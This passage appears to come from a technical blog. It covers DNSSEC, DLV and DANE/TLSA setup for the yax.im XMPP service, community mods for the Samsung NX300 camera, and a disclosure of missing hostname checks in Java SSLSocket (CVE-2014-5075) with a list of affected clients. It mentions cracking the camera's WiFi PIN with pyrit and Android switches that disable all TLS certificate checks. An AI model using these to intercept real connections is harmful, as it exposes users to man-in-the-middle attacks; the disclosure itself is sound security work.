While this is not quite what we wanted, it is sufficient to allow a correctly implemented client to connect to our server, without raising certificate errors.
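If you want to repeat the analysis without that script, the SAN entries can also be dumped with the Python cryptography package; a sketch, with the two otherName OIDs being id-on-dnsSRV (RFC 4985) and id-on-xmppAddr (RFC 3920/6120):

```python
from cryptography import x509
from cryptography.x509.oid import ExtensionOID, ObjectIdentifier

SRVNAME = ObjectIdentifier("1.3.6.1.5.5.7.8.7")   # id-on-dnsSRV (SRV-ID)
XMPPADDR = ObjectIdentifier("1.3.6.1.5.5.7.8.5")  # id-on-xmppAddr

with open("yaxim.crt", "rb") as f:
    cert = x509.load_pem_x509_certificate(f.read())

san = cert.extensions.get_extension_for_oid(
    ExtensionOID.SUBJECT_ALTERNATIVE_NAME).value
print("dNSName:", san.get_values_for_type(x509.DNSName))
for other in san.get_values_for_type(x509.OtherName):
    label = {SRVNAME: "sRVName", XMPPADDR: "xmppAddr"}.get(
        other.type_id, other.type_id.dotted_string)
    # other.value is the DER-encoded inner string, so expect a short
    # type/length prefix before the readable name
    print(label, other.value)
```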
Configuring DNSSEC for Your Domain(s)
In the next step, the domain (in our case both yax.im
and yaxim.org
, but
the following examples will only list yax.im
) needs to be signed with DNSSEC.
Because I'm a lazy guy, I'm using BIND 9.9, which does inline-signing (all I
need to do is create some keys and enable the feature).
Key Creation with BIND 9.9
For each domain, a zone signing key (ZSK) is needed to sign the individual records. Furthermore, a key signing key (KSK) should be created to sign the ZSK. This allows you to rotate the ZSK as often as you wish.
# create key directory
mkdir /etc/bind/keys
cd /etc/bind/keys
# create key signing key
dnssec-keygen -f KSK -3 -a RSASHA256 -b 2048 yax.im
# create zone signing key
dnssec-keygen -3 -a RSASHA256 -b 2048 yax.im
# make all keys readable by BIND
chown -R bind.bind .
To enable it, you need to configure the key directory, inline signing and automatic re-signing:
zone "yax.im" {
...
key-directory "/etc/bind/keys";
inline-signing yes;
auto-dnssec maintain;
};
After reloading the config, the keys need to be enabled in BIND:
# load keys and check if they are enabled
$ rndc loadkeys yax.im
$ rndc signing -list yax.im
Done signing with key 17389/RSASHA256
Done signing with key 24870/RSASHA256
The above steps need to be performed for yaxim.org
as well.
NSEC3 Against Zone Walking
Finally, we also want to enable NSEC3 to prevent curious people from "walking the zone", i.e. retrieving a full list of all host names under our domains. To accomplish that, we need to specify some parameters for hashing names. These parameters will be published in an NSEC3PARAM record, which resolvers can use to apply the same hashing mechanism as we do.
First, the hash function to be used. RFC 5155, section 4.1 tells us that...
"The acceptable values are the same as the corresponding field in the NSEC3 RR."
NSEC3 is also defined in RFC 5155, albeit in section 3.1.1. There, we learn that...
"The values for this field are defined in the NSEC3 hash algorithm registry defined in Section 11."
It's right there... at the end of the section:
Finally, this document creates a new IANA registry for NSEC3 hash algorithms. This registry is named "DNSSEC NSEC3 Hash Algorithms". The initial contents of this registry are:
0 is Reserved.
1 is SHA-1.
2-255 Available for assignment.
Let's pick 1
from this plethora of choices, then.
The second parameter is "Flags", which is also defined in Section 11, and must
be 0
for now (other values have to be defined yet).
The third parameter is the number of iterations for the hash function. For a
2048 bit key, it MUST NOT exceed 500.
BIND defaults to 10; Strotman references 330 from RFC 4641bis, but it seems that number has since been removed. We take this number anyway.
The last parameter is a salt for the hash function (a random hexadecimal string; we use 8 bytes). You should not copy the value from another domain, to prevent rainbow-table attacks, but there is no need to keep it very secret.
$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yaxim.org
$ rndc signing -nsec3param 1 0 330 $(head -c 8 /dev/random|hexdump -e '"%02x"') yax.im
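To illustrate what resolvers do with these parameters, the RFC 5155 hash is simple enough to sketch in Python (3.10+ for b32hexencode; the salt below is made up):

```python
import base64
import hashlib

def nsec3_hash(name: str, salt_hex: str, iterations: int) -> str:
    # owner name in DNS wire format: length-prefixed lowercase labels + root
    wire = b"".join(
        bytes([len(label)]) + label
        for label in name.lower().encode("ascii").split(b".") if label
    ) + b"\x00"
    salt = bytes.fromhex(salt_hex)
    digest = hashlib.sha1(wire + salt).digest()
    for _ in range(iterations):  # "iterations" means additional rounds
        digest = hashlib.sha1(digest + salt).digest()
    # hashed owner names appear base32hex-encoded in the signed zone
    return base64.b32hexencode(digest).decode("ascii").lower()

print(nsec3_hash("yax.im", "c0ffee42deadbeef", 330) + ".yax.im.")
```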
Whenever you update the NSEC3PARAM
value, your zone will be re-signed and
re-published. That means you can change the iteration count and salt value
later on, if the need should arise.
Configuring the DS (Delegation Signer) Record for yaxim.org
If your domain is on an
already-signed TLD
(like yaxim.org
on .org
), you need to establish a trust link from the
.org
zone to your domain's signature keys (the KSK, to be precise). For
this purpose, the
delegation signer (DS
) record type has
been created.
A DS
record is a signed record in the parent domain (.org
) that identifies
a valid key for a given sub-domain (yaxim.org
). Multiple DS
records can
coexist to allow key rollover. If you are running an important service, you
should create a second KSK, store it in a safe place, and add its DS
in
addition to the currently used one. Should your primary name server go up in
flames, you can recover without waiting for the domain registrar to update
your records.
Exporting the DS Record
To obtain the DS
record, BIND comes with the dnssec-dsfromkey
tool. Just
pipe all your keys into it, and it will output DS
records for the KSKs. We
do not want SHA-1 records any more, so we pass -2
as well to get the SHA-256
record:
$ dig @127.0.0.1 DNSKEY yaxim.org | dnssec-dsfromkey -f - -2 yaxim.org
yaxim.org. IN DS 42199 8 2 35E4E171FC21C6637A39EBAF0B2E6C0A3FE92E3D2C983281649D9F4AE3A42533
This line is what you need to submit to your domain registrar (using their web interface or by means of a support ticket). The information contained is:
- key tag: 42199 (this is just a numeric ID for the key, useful for key rollovers)
- signature algorithm: 8 (RSA / SHA-256)
- DS digest type: 2 (SHA-256)
- hash value: 35E4E171...E3A42533
However, some registrars insist on creating the DS
record themselves, and
require you to send in your DNSKEY
. We only need to give them the KSK (type
257), so we filter the output accordingly:
$ dig @127.0.0.1 DNSKEY yaxim.org | grep 257
yaxim.org. 86400 IN DNSKEY 257 3 8
AwEAAcDCzsLhZT849AaG6gbFzFidUyudYyq6NHHbScMl+PPfudz5pCBt
G2AnDoqaW88TiI9c92x5f+u9Yx0fCiHYveN8XE2ed/IQB3nBW9VHiGQC
CliM0yDxCPyuffSN6uJNVHPEtpbI4Kk+DTcweTI/+mtTD+sC+w/CST/V
NFc5hV805bJiZy26iJtchuA9Bx9GzB2gkrdWFKxbjwKLF+er2Yr5wHhS
Ttmvntyokio+cVgD1UaNKcewnaLS1jDouJ9Gy2OJFAHJoKvOl6zaIJuX
mthCvmohlsR46Sp371oS79zrXF3LWc2zN67T0fc65uaMPkeIsoYhbsfS
/aijJhguS/s=
Validation of the Trust Chain
As soon as the record is updated, you can check the trustworthiness of your
domain. Unfortunately, all of the available command-line tools suck. One of
the least-sucking ones is drill
from
ldns. It still needs a root.key
file that contains the officially trusted DNSSEC key for the .
(root)
domain. In Debian, the
dns-root-data package
places it under /usr/share/dns/root.key
. Let's drill
our domain name with
DNSSEC (-D
), tracing from the root zone (-T
), quietly (-Q
):
$ drill -DTQ -k /usr/share/dns/root.key yaxim.org
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] org. 86400 IN DS 21366 7 1 e6c1716cfb6bdc84e84ce1ab5510dac69173b5b2
org. 86400 IN DS 21366 7 2 96eeb2ffd9b00cd4694e78278b5efdab0a80446567b69f634da078f0d90f01ba
;; Domain: org.
[T] org. 900 IN DNSKEY 257 3 7 ;{id = 9795 (ksk), size = 2048b}
org. 900 IN DNSKEY 256 3 7 ;{id = 56198 (zsk), size = 1024b}
org. 900 IN DNSKEY 256 3 7 ;{id = 34023 (zsk), size = 1024b}
org. 900 IN DNSKEY 257 3 7 ;{id = 21366 (ksk), size = 2048b}
[T] yaxim.org. 86400 IN DS 42199 8 2 35e4e171fc21c6637a39ebaf0b2e6c0a3fe92e3d2c983281649d9f4ae3a42533
;; Domain: yaxim.org.
[T] yaxim.org. 86400 IN DNSKEY 257 3 8 ;{id = 42199 (ksk), size = 2048b}
yaxim.org. 86400 IN DNSKEY 256 3 8 ;{id = 6384 (zsk), size = 2048b}
[T] yaxim.org. 3600 IN A 83.223.75.29
;;[S] self sig OK; [B] bogus; [T] trusted
The above output traces from the initially trusted .
key to org
, then to
yaxim.org
and determines that yaxim.org is properly DNSSEC-signed and
therefore trusted ([T]
). This is already a big step, but the tool lacks some
color, and it does not allow explicitly querying the domain's name servers
(unless they are open resolvers), so you can't test your config prior to going
live.
To get a better view of our DNSSEC situation, we can query some online services:
- DNS Viz by Sandia Labs: yaxim.org results
- DNSSEC Debugger by Verisign: yaxim.org results
- Livetest by Lutz Donnerhacke: yaxim.org results (German, and you need to click through the HTTPS warnings)
Ironically, neither DNSViz nor Verisign support encrypted connections via HTTPS, and Lutz' livetest is using an untrusted root.
Enabling DNSSEC Look-aside Validation for yax.im
Unfortunately, we cannot do the same with our short and shiny yax.im domain. If we try to drill it, we get the following:
$ drill -DTQ -k /usr/share/dns/root.key yax.im
;; Number of trusted keys: 1
;; Domain: .
[T] . 172800 IN DNSKEY 256 3 8 ;{id = 48613 (zsk), size = 1024b}
. 172800 IN DNSKEY 257 3 8 ;{id = 19036 (ksk), size = 2048b}
[T] Existence denied: im. DS
;; Domain: im.
;; No DNSKEY record found for im.
;; No DS for yax.im.;; Domain: yax.im.
[S] yax.im. 86400 IN DNSKEY 257 3 8 ;{id = 17389 (ksk), size = 2048b}
yax.im. 86400 IN DNSKEY 256 3 8 ;{id = 24870 (zsk), size = 2048b}
[S] yax.im. 3600 IN A 83.223.75.29
;;[S] self sig OK; [B] bogus; [T] trusted
There are two pieces of relevant information here:
- [T] Existence denied: im. DS - the top-level zone assures that .IM is not DNSSEC-signed (it has no DS record).
- [S] yax.im. 3600 IN A 83.223.75.29 - yax.im is self-signed, providing no way to check its authenticity.
The .IM top-level domain for the Isle of Man is operated by Domicilium. A friendly support request reveals the following:
Unfortunately there is no ETA for DNSSEC support at this time.
That means there is no way to create a chain of trust from the root zone to yax.im.
Fortunately, the designers of DNSSEC anticipated this problem. To accelerate adoption of DNSSEC by second-level domains, the concept of look-aside validation was introduced in 2006. It allows using an alternative trust root if the hierarchical chaining is not possible. The ISC is even operating such an alternative trust root. All we need to do is register our domain with them, and add them to our resolvers (because they aren't added by default).
After registering with DLV, we are asked to add our domain with its respective
KSK domain key entry. To prove domain and key ownership, we must further
create a signed TXT
record under dlv.yax.im
with a specific value:
dlv.yax.im. IN TXT "DLV:1:fcvnnskwirut"
Afterwards, we request DLV to check our domain. It queries all of the domains' DNS servers for the relevant information and compares the results. Unfortunately, our domain fails the check:
FAILURE 69.36.225.255 has extra: yax.im. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE 69.36.225.255 has extra: yax.im. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE 69.36.225.255 missing: YAX.IM. 86400 IN DNSKEY 256 3 RSASHA256 ( AwEAAepYQ66j42jjNHN50gUldFSZEfShF...
FAILURE 69.36.225.255 missing: YAX.IM. 86400 IN DNSKEY 257 3 RSASHA256 ( AwEAAcB7Fx3T/byAWrKVzmivuH1bpP5Jx...
FAILURE This means your DNS servers are out of sync. Either wait until the DNSKEY data is the same, or fix your server's contents.
This looks like a combination of two different issues:
- A part of our name servers is returning YAX.IM when asked for yax.im.
- The DLV script is case-sensitive when it comes to domains.
Problem #1 is officially not a problem. DNS is case-insensitive, and therefore all clients that fail to accept YAX.IM answers to yax.im requests are broken. In practice, this hits not only the DLV resolver (problem #2), but also the resolver code in Erlang, which is used in the widely-deployed ejabberd XMPP server.
While we can't fix all the broken servers out there, #2 has been reported and fixed, and hopefully the fix has been rolled out to production already. Still, issue #1 needs to be solved.
It turns out that it is caused by
case insensitive response compression.
You can't make this stuff up!
Fortunately,
BIND 9.9.6
added the no-case-compress
ACL, so "all you need to do" is to upgrade BIND and
enable that shiny new feature.
After checking and re-checking the dlv.yax.im TXT record with DLV, there is finally progress:
SUCCESS DNSKEY signatures validated.
...
SUCCESS COOKIE: Good signature on TXT response from <NS IP>
SUCCESS <NS IP> has authentication cookie DLV:1:fcvnnskwirut
...
FINAL_SUCCESS Success.
After your domain got validated, it will receive its look-aside validation records under dlv.isc.org:
$ dig +noall +answer DLV yax.im.dlv.isc.org
yax.im.dlv.isc.org. 3451 IN DLV 17389 8 2 C41AFEB57D71C5DB157BBA5CB7212807AB2CEE562356E9F4EF4EACC2 C4E69578
yax.im.dlv.isc.org. 3451 IN DLV 17389 8 1 8BA3751D202EF8EE9CE2005FAF159031C5CAB68A
This looks like a real success. Except that nobody is using DLV in their resolvers by default, and DLV will stop operations in 2017.
Until then, you can enable look-aside validation in your BIND and Unbound resolvers.
Lutz' livetest service supports checking DLV-backed domains as well, so let's verify our configuration:
- yax.im results (again, just click through the HTTPS warnings!)
Creating TLSA Records for HTTP and SRV
Now that we have created keys, signed our zones and established trust into them from the root (more or less), we can put more sensitive information into DNS, and our users can verify that it was actually added by us (or one of at most two or three governments: the US, the TLD holder, and where your nameservers are hosted).
This allows us to add a second, independent, trust root to the TLS
certificates we use for our web server (yaxim.org
) as well as for our XMPP
server, by means of TLSA
records.
These record types are defined in RFC 6698 and consist of the following pieces of information:
- domain name (i.e.
www.yaxim.org
) - certificate usage (is it a CA or a server certificate, is it signed by a "trusted" Root CA?)
- selector + matching type + certificate association data (the actual certificate reference, encoded in one of multiple possible forms)
Domain Name
The domain name is the hostname in the case of HTTPS, but it's slightly
more complicated for the XMPP SRV
record, because there we have the service
domain (yax.im
), the conference domain (chat.yax.im
) and the actual server
domain name (xmpp.yaxim.org
).
The behavior for SRV
TLSA
handling is defined in
RFC 7673,
published as Proposed Standard in October 2015.
First, the
client must validate that the SRV
response for the service domain is properly
DNSSEC-signed. Only then the client can trust that the server named in the
SRV
record is actually responsible for the service.
In the next step,
the client must ensure that the address response (A
for IPv4 and AAAA
for
IPv6) is DNSSEC-signed as well, or fall back to the next SRV
record.
If both the SRV
and the A
/AAAA
records are properly signed, the client
must
do a TLSA
lookup
for the SRV
target (which is _5222._tcp.xmpp.yaxim.org
for our client
users, or _5269._tcp.xmpp.yaxim.org
for other XMPP servers connecting to us).
Certificate Usage
The certificate usage field can take one of four possible values. Translated into English, the possibilities are:
- 0, "trusted" CA - the provided cert is a CA cert that is trusted by the client, and the server certificate must be signed by this CA. We could use this to indicate that our server will only use StartSSL-issued certificates.
- 1, "trusted" server certificate - the provided cert corresponds to the certificate returned over TLS and must be signed by a trusted Root CA. We will use this to deliver our server certificate.
- 2, "untrusted" CA - the provided CA certificate must be the one used to sign the server's certificate. We could roll out a private CA and use this type, but it would cause issues with non-DNSSEC clients.
- 3, "untrusted" server certificate - the provided certificate must be the same as returned by the server, and no Root CA trust checks shall be performed.
The Actual Certificate Association
Now that we know the server name for which the certificate is valid and the type of certificate and trust checks to perform, we need to store the actual certificate reference. Three fields are used to encode the certificate reference.
The selector defines
whether the full certificate (0
) or only the
SubjectPublicKeyInfo field (1
)
is referenced. The latter allows getting the server key re-signed by a
different CA without changing the TLSA records. The former could be
theoretically used to put the full certificate into DNS (a rather bad idea for
TLS, but might be interesting for S/MIME certs).
The matching type field defines how the "selected" data (certificate or SubjectPublicKeyInfo) is stored:
- 0: exact match of the whole "selected" data
- 1: SHA-256 hash of the "selected" data
- 2: SHA-512 hash of the "selected" data
Finally, the certificate association data is the certificate/SubjectPublicKeyInfo data or hash, as described by the previous fields.
Putting it all Together
A good configuration for our service is a record based on a CA-issued server
certificate (certificate usage 1
), with the full certificate (selector 0
)
hashed via SHA-256 (matching type 1
). We can obtain the required association
data using OpenSSL command line tools:
openssl x509 -in yaxim.org-2014.crt -outform DER | openssl sha256
(stdin)= bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
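The same digest can also be computed with Python's standard library against the live server, which comes in handy for monitoring:

```python
import hashlib
import ssl

# fetch the server certificate and hash the full DER encoding
# (selector 0, matching type 1)
pem = ssl.get_server_certificate(("yaxim.org", 443))
der = ssl.PEM_cert_to_DER_cert(pem)
print(hashlib.sha256(der).hexdigest())
```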
Taken together, this results in the following entries for HTTPS on yaxim.org and www.yaxim.org:
_443._tcp.yaxim.org IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
_443._tcp.www.yaxim.org IN TLSA 1 0 1 bbcc3ca09abfc28beb4288c41f4703a74a8f375a6621b55712600335257b09a9
This is also the SHA-256 fingerprint you can see in your web browser.
For the XMPP part, we need to add TLSA records for the SRV targets
(_5222._tcp.xmpp.yaxim.org
for clients and _5269._tcp.xmpp.yaxim.org
for
servers). There should be no need to make TLSA records for the service domain
(_5222._tcp.yax.im
), because a modern client will always try to resolve SRV
records, and no DNSSEC validation will be possible if that fails.
Here, we take the SHA-256 sum of the yax.im
certificate we obtained from
StartSSL, and create two records with the same type and format as above:
_5222._tcp.xmpp.yaxim.org IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836
_5269._tcp.xmpp.yaxim.org IN TLSA 1 0 1 cef7f6418b7d6c8e71a2413f302f92fc97e57ec18b36f97a4493964564c84836
These fields will be used by DNSSEC-enabled clients to verify the TLS certificate presented by our XMPP service.
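A small end-to-end check can compare the published record against the deployed certificate. The sketch below uses dnspython and performs no DNSSEC validation (which a real client must add); since port 5222 speaks STARTTLS, it checks the local PEM file (name made up) instead of fetching the certificate over the wire:

```python
import hashlib
import ssl

import dns.resolver  # pip install dnspython

# published TLSA record for the client SRV target
tlsa = dns.resolver.resolve("_5222._tcp.xmpp.yaxim.org", "TLSA")[0]
print("published:", tlsa.usage, tlsa.selector, tlsa.mtype, tlsa.cert.hex())

# digest of the certificate we actually deploy on the server
with open("yax.im.crt") as f:
    der = ssl.PEM_cert_to_DER_cert(f.read())
digest = hashlib.sha256(der).digest()
print("match" if digest == tlsa.cert else "MISMATCH")
```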
Replacing the Server Certificate
Now that the TLSA records are in place, it is not as easy to replace your server certificate as it was before, because the old one is now anchored in DNS.
You need to perform the following steps in order to ensure that all clients will be able to connect at any time:
- Obtain the new certificate
- Create a second set of TLSA records, for the new certificate (keep the old one in place)
- Wait for the configured DNS time-to-live to ensure that all users have received both sets of TLSA records
- Replace the old certificate on the server with the new one
- Remove the old TLSA records
If you fail to add the TLSA records and wait the DNS TTL, some clients will have cached a copy of only the old TLSA records, so they will reject your new server certificate.
Conclusion
DANE for XMPP is a chicken-and-egg problem. As long as there are no servers, it will not be implemented in the clients, and vice versa. However, the (currently unavailable) xmpp.net XMPP security analyzer is checking the DANE validation status, and GSoC 2015 brought us DNSSEC support in minidns, which soon will be leveraged in Smack-based XMPP clients.
With this (rather long) post covering all the steps of a successful DNSSEC implementation, including the special challenges of .IM domains, I hope to pave the way for more XMPP server operators to follow.
Enabling DNSSEC and DANE provides an improvement over the rather broken Root CA trust model, however it is not without controversy. tptacek makes strong arguments against DNSSEC, because it is using outdated crypto and because it doesn't completely solve the government-level MitM problem. Unfortunately, his proposal to "do nothing" will not improve the situation, and the only positive contribution ("use TACK!") expired in 2013.
Finally, one last technical issue not covered by this post is periodic key rollover; this will be covered by a separate post eventually.
This is the third post in a series covering the Samsung NX300 "Smart" Camera. In the first post, we have analyzed how the camera is interacting with the outside world using NFC and WiFi. The second one showed a method to gain a remote root shell, and it spawned a number of interesting projects. This post is a reference collection of these projects, and a call for collaboration.
Samsung NX300 Firmware Update
First, I want to thank Samsung for fixing the most serious security problems in the NX300 firmware. As of firmware version 1.41, the X server is closed down and there is an option to encrypt the WiFi network spawned by the camera with WPA2:
[v1.41]
1.Add Wi-Fi Privacy Lock function
2.Revision Open Source Licenses
Unfortunately, the provided 8-digit PIN can be cracked in less than one hour using pyrit on a mid-range GPU. While this is far from good security, it requires at least some dedication from the attacker.
Even more unfortunately, Samsung removed autoexec.sh
execution from the
NX300M firmware starting with (or after) 1.11. Dear Samsung engineers, if you
are reading this: please add it back! Executing code from the SD card (without
modifying the firmware image) is a great opportunity, not a security problem!
Most of the mods discussed in this post are leveraging that functionality in a
creative way!
Automatic Photo Backups
Markus A. Kuppe has written a
tutorial for auto-backups of the NX300
using an ftp client on the camera and a Raspberry Pi ftp server. One
interesting bit of information is how to make the camera auto-connect to WiFi
whenever it is turned on, using a custom wpa_supplicant.conf
and DBus:
# copy the prepared WiFi configuration from the SD card
cp /mnt/mmc/wpa_supplicant.conf /tmp/
# bring up the WiFi hardware
/usr/bin/wlan.sh start NL 0x8210
# start the connman network manager with the nl80211 WiFi driver
/usr/sbin/connmand -W nl80211 -r
/usr/sbin/net-config
sleep 2
# ask connman over DBus to connect to the stored network (the service
# path encodes the interface MAC and the hex-encoded SSID)
dbus-send --system --type=method_call --print-reply --dest=net.connman \
/net/connman/service/wifi_a0219572b25b_7777772e6c656d6d737465722e6465_managed_psk \
net.connman.Service.Connect
Jonathan Dieter created another backup mechanism using SCP and published the nx300m-autobackup source code. Well done!
Additional Kernel Modules
Markus also provided a short write-up on compiling additional kernel modules, which should allow us to extend the camera's functionality without re-flashing the firmware.
Crypto Photography
The most interesting idea, however, was envisioned by Doug Hickok. He modified the firmware to auto-encrypt photographs using public key cryptography. This allows for very interesting use cases like letting a professional photographer take pictures without allowing him to keep a copy, or for investigative journalists to hide their data tracks.
In the current implementation the pictures are first stored to the SD card and then encrypted and deleted, allowing for undelete attacks. Do not use it in production yet. With some more tweaking, however, it should be possible to make this firmware actually deliver the security promise.
Announcement: Samsung NX Hacks
Seeing how there is a (still small) community of tinkerers around the NX300 camera, and with the knowledge that a whole range of Samsung NX cameras comes with Tizen-based firmware (NX1, NX200, NX2000, NX300M, ...?), the author has created a repository and a Wiki on GitHub.
Feel free to contribute to the wiki or the project - every input is welcome, starting from transferring information from the blog posts linked above into a more structured form in the wiki, and up to creating firmware modifications to allow for exciting new features.
Internet security is hard.
TLS is almost impossible. Implementing TLS correctly in Java is a nightmare! While the higher-level
HttpsURLConnection
and Apache's
DefaultHttpClient
do it (mostly) right, direct users of Java SSL sockets
(SSLSocket
/
SSLEngine
,
SSLSocketFactory
)
are left exposed to Man-in-the-Middle attacks, unless the application
manually checks the hostname against the certificate or employs certificate
pinning.
The SSLSocket documentation claims that the socket provides "Integrity Protection", "Authentication", and "Confidentiality", even against active wiretappers. That impression is underscored by the rigorous certificate checking performed when connecting, which makes it ridiculously hard to run development/test installations. However, these checks turn out to be completely worthless against active MitM attackers, because SSLSocket will happily accept any valid certificate (like one for a domain owned by the attacker). Due to this, many applications using SSLSocket can be attacked with little effort.
This problem has been written about, but CVE-2014-5075 shows that it can not be stressed enough.
Affected Applications
This problem affects applications that make use of SSL/TLS, but not HTTPS. The best candidates to look for it are therefore clients for application-level protocols like e-mail (POP3/IMAP), instant messaging (XMPP), file transfer (FTP). CVE-2014-5075 is the respective vulnerability of the Smack XMPP client library, so this is a good starting point.
XMPP Clients
XMPP clients based on Smack (which was fixed on 2014-07-22):
- ChatSecure (fixed in 13.2.0-beta1)
- GTalkSMS (contacted on 2014-07-28)
- MAXS (tracker issue, fixed in 0.0.1.18)
- yaxim and Bruno (fixed in 0.8.8)
- undisclosed Android application (contacted on 2014-07-21)
Other XMPP clients:
- babbler (another XMPP library; fixed on 2014-07-27)
- Conversations (Android client, custom XMPP implementation, fixed in version 0.5)
- Sawim (Android client, contacted on 2014-07-22)
- Stroke (another XMPP client library, fixed in git)
- Tigase (contacted on 2014-07-27)
Not Vulnerable Applications
The following applications have been checked as well, and contained code to compensate for SSLSocket's shortcomings:
- Jitsi (OSS conferencing client)
- K9-Mail (Android e-Mail client)
- Xabber (Based on Smack, but using its own hostname verification)
Background: Security APIs in Java
The amount of vulnerable applications can be easily explained after a deep dive into the security APIs provided by Java (and its offsprings). Therefore, this section will handle the dirty details of trust (mis)management in the most important implementations: old Java, new Java, Android and in Apache's HttpClient.
Java SE up to and including 1.6
When network security was added to Java 1.4 with the JSSE (and we all know how well security-as-an-afterthought works), two distinct APIs were created: one for certificate verification and one for hostname verification. The rationale for that decision was probably that the TLS/SSL handshake happens at the socket layer, whereas hostname verification depends on the application-level protocol (HTTPS at that time). Therefore, the X509TrustManager class for certificate trust checks was integrated into the low-level SSLSocket and SSLEngine classes, whereas the HostnameVerifier API was only incorporated into HttpsURLConnection.
The API design was not very future-proof either: X509TrustManager's checkClientTrusted() and checkServerTrusted() methods are only passed the certificate chain and authentication type parameters. There is no reference to the actual SSL connection or its peer name. The only workaround to allow hostname verification through this API is to create a custom TrustManager for each connection and to store the peer's hostname in it. This is neither elegant, nor does it scale well with multiple connections.
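A sketch of that workaround (class and method names are mine): wrap the platform TrustManager and smuggle the hostname in via the constructor, so that checkServerTrusted() can verify it after the chain check:
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.X509TrustManager;

// One instance per connection, carrying the peer name (pre-Java-7 workaround).
class HostnameAwareTrustManager implements X509TrustManager {
    private final X509TrustManager defaultTm;
    private final String hostname;

    HostnameAwareTrustManager(X509TrustManager defaultTm, String hostname) {
        this.defaultTm = defaultTm;
        this.hostname = hostname;
    }
    public void checkClientTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        defaultTm.checkClientTrusted(chain, authType);
    }
    public void checkServerTrusted(X509Certificate[] chain, String authType)
            throws CertificateException {
        defaultTm.checkServerTrusted(chain, authType); // certificate chain check
        checkHostname(hostname, chain[0]);             // the missing piece
    }
    public X509Certificate[] getAcceptedIssuers() {
        return defaultTm.getAcceptedIssuers();
    }
    private void checkHostname(String host, X509Certificate cert)
            throws CertificateException {
        // hypothetical helper: match 'host' against the certificate's
        // subjectAltNames per RFC 6125, e.g. by delegating to Apache's
        // StrictHostnameVerifier (see below)
    }
}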
The HostnameVerifier, on the other hand, has access to both the hostname and the session, making a full verification possible. However, only HttpsURLConnection makes use of a HostnameVerifier (and it only asks the verifier if it determines a mismatch between the peer and its certificate, so the default HostnameVerifier always fails).
Besides the default HostnameVerifier being unusable due to always failing, the API has another subtle surprise: while the TrustManager methods fail by throwing a CertificateException, HostnameVerifier.verify() simply returns false if verification fails.
As the API designers realized that users of the raw SSLSocket might fall into a certificate verification trap set up by their API, they added a well-buried warning to the JSSE reference guide for Java 5, which I am sure you have read multiple times (or at least printed and put under your pillow):
IMPORTANT NOTE: When using raw SSLSockets/SSLEngines you should always check the peer's credentials before sending any data. The SSLSocket/SSLEngine classes do not automatically verify, for example, that the hostname in a URL matches the hostname in the peer's credentials. An application could be exploited with URL spoofing if the hostname is not verified.
Of course, URLs are only a thing in HTTPS, but you get the point... provided that you actually have read the reference guide... up to this place. If you only read the SSLSocket marketing reference article, and thought that you are safe because it does not mention any of the pitfalls: shame on you!
And even if you did read the warning, there is no hint about how to implement the peer credential checks. There is no API class that would perform this tedious and error-prone task, and implementing it yourself requires a Ph.D. degree in rocket surgery, as well as deep knowledge of some related Internet standards¹.
¹ Side note: even if you do not believe SSL conspiracy theories, or the confirmed facts about the deliberate manipulation of Internet standards by NSA and GCHQ, there is one prominent example of how the implementation of security mechanisms can be aggravated by adding complexity - the title of RFC 6125: "Representation and Verification of Domain-Based Application Service Identity within Internet Public Key Infrastructure Using X.509 (PKIX) Certificates in the Context of Transport Layer Security (TLS)".
Apache HttpClient
The Apache HttpClient library is a full-featured HTTP client written in pure Java, adding flexibility and functionality in comparison to the default HTTP implementation.
The Apache library developers came up with their own API interface for hostname verification, X509HostnameVerifier, which also happens to incorporate Java's HostnameVerifier interface. The new methods added by Apache are expected to throw an SSLException when verification fails, while the old method still returns true or false, of course. It is hard to tell whether this interface mixing adds confusion or reduces it. One way or the other, it results in the appropriate glue code:
public final boolean verify(String host, SSLSession session) {
try {
Certificate[] certs = session.getPeerCertificates();
X509Certificate x509 = (X509Certificate) certs[0];
verify(host, x509);
return true;
}
catch(SSLException e) {
return false;
}
}
Based on that interface, AllowAllHostnameVerifier, BrowserCompatHostnameVerifier, and StrictHostnameVerifier were created, which can actually be plugged into anything expecting a plain HostnameVerifier. The latter two also actually perform hostname verification, as opposed to the default verifier in Java, so they can be used wherever appropriate. Their difference is:
The only difference between BROWSER_COMPATIBLE and STRICT is that a wildcard (such as "*.foo.com") with BROWSER_COMPATIBLE matches all subdomains, including "a.b.foo.com".
If you can make use of Apache's HttpClient library, just plug in one of these verifiers and have a happy life:
sslSocket = ...;
sslSocket.startHandshake();
HostnameVerifier verifier = new StrictHostnameVerifier();
if (!verifier.verify(serviceName, sslSocket.getSession())) {
throw new CertificateException("Server failed to authenticate as " + serviceName);
}
// NOW you can send and receive data!
Android
Android's designers must have been well aware of the shortcomings of the Java implementation, and of the problems that an application developer might encounter when testing and debugging. They created the SSLCertificateSocketFactory class, which makes a developer's life really easy:
- It is available on all Android devices, starting with API level 1.
- It comes with appropriate warnings about its security parameters and limitations:
Most SSLSocketFactory implementations do not verify the server's identity, allowing man-in-the-middle attacks. This implementation does check the server's certificate hostname, but only for createSocket variants that specify a hostname. When using methods that use InetAddress or which return an unconnected socket, you MUST verify the server's identity yourself to ensure a secure connection.
- It provides developers with two easy ways to disable all security checks for testing purposes: a) a static getInsecure() method (as of API level 8), and b) a system property on development devices:
On development devices, "setprop socket.relaxsslcheck yes" bypasses all SSL certificate and hostname checks for testing purposes. This setting requires root access.
- Uses of the insecure instance are logged via adb:
Bypassing SSL security checks at caller's request
Or, when the system property is set:
*** BYPASSING SSL SECURITY CHECKS (socket.relaxsslcheck=yes) ***
Some time in 2013, a training article about Security with HTTPS and SSL was added, which also features its own section of "Warnings About Using SSLSocket Directly", once again explicitly warning the developer:
